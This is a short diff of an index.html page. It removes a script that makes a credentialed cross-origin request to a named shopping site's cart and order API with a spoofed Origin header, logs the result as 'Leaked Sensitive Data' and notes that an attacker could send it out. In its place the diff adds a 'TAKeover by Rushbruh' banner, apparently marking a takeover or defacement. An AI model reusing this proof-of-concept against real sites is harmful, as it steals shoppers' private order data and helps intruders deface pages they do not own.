--- a/index.html
+++ b/index.html
@@ -1,19 +1,5 @@
 <html>
   <body>
-    <script>
-      fetch("https://www.opposhop.cn/cn/oapi/orders/web/cart/v1/list?opca=", {
-        method: "GET",
-        credentials: "include",
-        headers: {
-          "Origin": "https://test.tulexx.pl/"
-        }
-      })
-      .then(response => response.json())
-      .then(data => {
-        console.log("Leaked Sensitive Data:", data);
-        // Or attacker could exfiltrate to external server
-      })
-      .catch(err => console.error(err));
-    </script>
+  <h1>TAKeover by Rushbruh</h1>
   </body>
 </html>
